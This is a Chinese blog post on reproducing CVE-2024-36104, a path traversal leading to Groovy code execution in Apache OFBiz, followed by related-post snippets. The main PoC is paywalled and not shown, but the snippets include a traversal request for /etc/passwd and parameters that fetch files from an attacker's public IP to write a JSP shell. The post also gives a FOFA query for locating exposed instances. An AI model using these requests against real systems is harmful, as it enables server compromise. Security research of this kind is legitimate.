Apache OFBiz 路径遍历导致RCE漏洞复现(CVE-2024-36104)

已于 2024-06-04 20:09:52 修改
阅读量2.7k 收藏
点赞数 23
CC 4.0 BY-SA版权
分类专栏: 漏洞复现v1 文章标签: apache web安全 安全
于 2024-06-04 16:46:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139446728
本文详细介绍了Apache OFBiz中存在的远程命令执行漏洞(CVE-2024-36104),该漏洞由于ControlFilter类对路径的不适当限制,允许攻击者利用/webtools/control/ProgramExport接口执行任意Groovy代码。受影响的版本为Apache OFBiz 18.12.14及以前。复现环境可通过FOFA查询,目前Apache官方已发布补丁进行修复。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。

0x02 漏洞概述

Apache OFBiz 18.12.14之前版本存在命令执行漏洞,该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径(请求URL中的特殊字符(如 ;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。

0x03 影响范围

Apache OFBiz <= 18.12.14

0x04 复现环境

FOFA:app="Apache_OFBiz"

c0fb3204947b44dbb277a97723892e65.png

0x05 漏洞复现

PoC<

了解本专栏 订阅专栏 解锁全文 超级会员免费看
漏洞复现Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104)
qq_67810151的博客
06-07 907
Apache OFBiz是一个功能强大、易于定制和扩展的开源ERP系统,适用于各种类型的企业。通过利用最新的技术标准和开源项目,Apache OFBiz为企业提供了一个高效、稳定、灵活的电子商务平台解决方案。
Apache OFBiz 未授权远程代码执行漏洞CVE-2024-45195)
iSee857的博客
09-08 1293
Apache OFBiz是⼀个著名的电⼦商务平台,提供了创建基于最新 J2EE/ XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应⽤服务器的多层、分布式电⼦商务类WEB应⽤系统的框架。Apache OFBiz 18.12.16 之前版本中,由于Web 应用程序中缺少视图授权检查,未经身份验证的远程威胁者可构造恶意请求写入恶意文件导致远程代码执行,从而获取服务器权限。在服务器上启动一个python http服务用以 请求发送。服务器上启的http服务收到访问链接。访问下列接口进行RCE验证。
Apache OFBiz路径遍历漏洞(CVE-2024-36104)
WuYSec的博客
06-05 828
Apache OFBiz 18.12.14之前版本存在命令执行漏洞 ,该漏洞源于ControlFilter对路径限制不当导致用户能够访问ProgramExport导出功能执行Groovy代码。Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。无垠Sec专注安全研究,包括但不限于代码审计、漏洞挖掘、思路分享等。目前仅需50,你就能得到常见系统1day漏洞POC、代码审计、漏洞分析、漏洞挖掘等。
Apache-OFBiz存在路径遍历导致RCE漏洞(CVE-2024-36104)
最新发布
swordheart的博客
05-15 344
ApacheOFBiz是一个由Apache基金会开发的企业级电子商务平台,支持跨平台、跨数据库和跨应用服务器的多层分布式应用。该系统基于Java,提供了一系列Web应用程序组件和工具。然而,ApacheOFBiz 18.12.14之前的版本存在一个严重的命令执行漏洞
【已复现Apache OFBiz 路径遍历漏洞(CVE-2024-36104)安全风险通告
smellycat000的专栏
06-06 915
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Apache OFBiz 路径遍历漏洞漏洞编号QVD-2024-21464,CVE-2024-36104公开时间2024-06-02影响量级万级奇安信评级高危CVSS 3.1分数9.8威胁类型代码执行利用可能性高POC状态已公开在野利用状态未发现EXP状态已公开技术细节状态已公开危害描述:未授权的攻击者可以通过构造恶意请求绕过认证,进⽽访...
目录遍历漏洞复现
ljh123321ljh的博客
03-25 346
1.在fofa中输入语法,查询目录遍历。3.我们可以app目录中下载文件等等。4.我们还可以访问其他目录的一些东西。
漏洞复现Apache OFBiz 授权不当致远程代码执行
今天是几号的博客
08-06 1148
攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。Apache OFBiz 是一个开源的企业资源计划 (ERP) 和客户关系管理 (CRM) 软件平台,提供全面的企业管理解决方案,包括电子商务、库存管理、制造、会计等功能,支持企业进行灵活的定制和扩展。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
Catalyze安全知识库
mashiro_hibiki的博客
05-21 443
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。分享行业内最新动态,解答交流各类技术问题。涉及方向包括Web渗透、免杀绕过、红蓝攻防、代码审计、应急响应、安全培训、CTF、小白入门、职业规划和疑难解答。
CVE-2024-36104 Apache OFBiz路径遍历RCE漏洞复现(附POC)
mashiro_hibiki的博客
06-05 2661
高质量安全知识星球社区,致力于漏洞挖掘,渗透技巧,安全资料,星球承诺会持续更新0/1/NDay及对应的批量利用工具,团队内部漏洞库,内外网攻防技巧,你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。,安全技术水平的催化者,星球针对成员的技术问题,快速提供思考方向及解决方案,并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等,以引导者和催化剂的方式助力安全技术水平的提升。Apache_OFBiz是一套基于通用架构的企业应用程序,使用通用数据,逻辑和流程组件。
Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)并拿到shell
weixin_67840381的博客
09-12 1282
DATAFILE_LOCATION=http://公网ip:端口/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://公网ip:端口/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce。Host: 对方的host。这次使用的nc命令为。
GitLab 目录遍历漏洞复现(CVE-2023-2825)
qq_34914659的博客
05-30 2966
漏洞存在于GitLab CE/EE版本16.0.0中,当嵌套在至少五个组中的公共项目中存在附件时,可在未经身份验证的情况下通过uploads功能遍历读取任意文件,导致敏感信息泄露。GitLab是一个用于仓库管理系统的开源项目,其使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。社区版(CE)和企业版(EE)的 16.0.0 版本,其它更早的版本几乎都不受影响。1.需要一个嵌套五层以上可公开访问到的group 组并添加项目。步骤四:项目添加完成,添加评论。步骤五:测试访问上传的文件。
SolarWinds Serv-U 目录遍历漏洞复现(CVE-2024-28995)
0xSec
06-14 1991
SolarWinds Serv-U 存在目录遍历漏洞(CVE-2024-28995),SolarWinds Serv-U 容易受到目录横向漏洞的影响,未经身份认证的远程攻击者通过构造特殊的请求可以下载读取远程目标系统上的任意文件,对机密性造成很高的影响。目前该漏洞技术细节与EXP已在互联网上公开,鉴于该漏洞影响范围较大,建议企业尽快做好自查及防护。
Nginx目录遍历漏洞复现
huayimy的博客
12-30 2572
Nginx目录遍历漏洞复现,this statement may fail through,error: 'struct crypt_data' has no member named 'current_salt'
CVE-2021-41773目录遍历(文件穿越)漏洞复现
qq_59826623的博客
10-11 2208
CVE-202141773目录遍历(文件穿越)漏洞 Linux环境下 进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。 等待文件下载…… 安装完成后重启服务 访问本地的8080端口 打开Burpsuite,构造get参数 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 转换为post参数 修改命令为POST /cgi-bin/.%2e/%2e
漏洞复现----17、Adobe ColdFusion目录遍历漏洞 (CVE-2010-2861)
七天
10-21 1303
文章目录一、漏洞介绍二、漏洞环境1、环境2、Payload三、漏洞复现1、logging/settings.cfm2、datasources/index.cfm3、j2eepackaging/editarchive.cfm4、CFIDE/administrator/settings/mappings.cfm5、CFIDE/administrator/enter.cfm四、特殊构造1、路径后不跟参数值,失败。2、路径后参数值为数字,成功。3、路径后参数值为字母,成功。4、路径后参数值为特殊符号,成功。 一、
twonkyserver 目录遍历CVE-2018-7171)漏洞复现【VULFOCUS靶场-初级】
01-12 3868
LYNX Twonky Server是美国LYNX TECHNOLOGY公司的一款媒体服务器,支持在连接的设备之间共享媒体内容。 LYNX Twonky Server 7.0.11版本至8.5版本中存在目录遍历漏洞。远程攻击者可通过向rpc/set_all发送带有‘..’序列的‘contentbase’参数利用该漏洞分享任意目录的内容。
漏洞情报 | Apache OFBiz 远程代码执行漏洞
爱国小白帽
03-22 549
0x01 漏洞描述 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 近日,360漏洞云监测到Apache OFBiz官方披露了Apache OFBiz远程代码执行漏洞安全通告,该漏洞出现在ofbiz/base/util/SafeObjectInputStream.java中,该功能为框架中的通用序列化处理类,未经身份验证的攻击者可构造恶意请求.
目录遍历漏洞+burp靶场复现
2401_84908950的博客
11-19 2119
usr/local/app/apache2/conf/httpd.conf //Apache2默认配置文件 /usr/local/app/apache2/conf/extra/httpd-vhost.conf //虚拟网站配置 /usr/local/app/php5/lib/php.ini //PHP相关配置。C:\ProgramFiles\mysql\data\mysql\user.MYD MySQL root密码。/etc/httpd/conf/httpd.conf //Apache配置文件。
Nginx漏洞修复之目录穿越(目录遍历)漏洞复现及修复
热门推荐
CharlesYan的博客
02-15 2万+
Nginx目录穿越(目录遍历)漏洞描述及修复方案
CVE-2024-45195
01-17
### CVE-2024-45195 漏洞详情 CVE-2024-45195 是 Apache OFBiz 中 `/viewdatafile` 接口存在的代码执行漏洞。此漏洞允许攻击者通过精心构造的请求,在服务器端执行任意代码,从而完全控制受影响的应用程序实例[^2]。 #### 影响范围 该漏洞影响所有使用 Apache OFBiz 应用框架并启用了 `/viewdatafile` 功能模块的部署环境。具体版本受影晌情况需参照官方公告确认,通常较新版本可能已经包含了对该问题的部分缓解措施。由于 Apache OFBiz 广泛应用于企业资源规划 (ERP) 和客户关系管理 (CRM),因此潜在的影响面较大。 #### 修复方案 为了防止利用此漏洞进行攻击,建议采取以下措施: 1. **立即更新至最新版**:尽快将 Apache OFBiz 升级到最新的稳定版本,因为开发者团队会在后续版本中修复此类安全问题。 2. **禁用不必要的服务接口**:如果业务逻辑不需要使用 `/viewdatafile` API,则应考虑将其关闭或限制访问权限,减少暴露风险。 3. **应用补丁**:对于无法立刻升级的情况,应当密切关注厂商发布的针对性修补程序,并及时安装以封堵漏洞。 4. **加强输入验证**:即使有其他防护手段,也应在应用程序层面强化对外部数据输入的校验机制,避免恶意参数穿透防御体系。 ```bash # 更新命令示例(实际操作前请查阅官方文档) cd /path/to/apache-ofbiz/ git pull origin main ./gradlew cleanAll build install ```
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值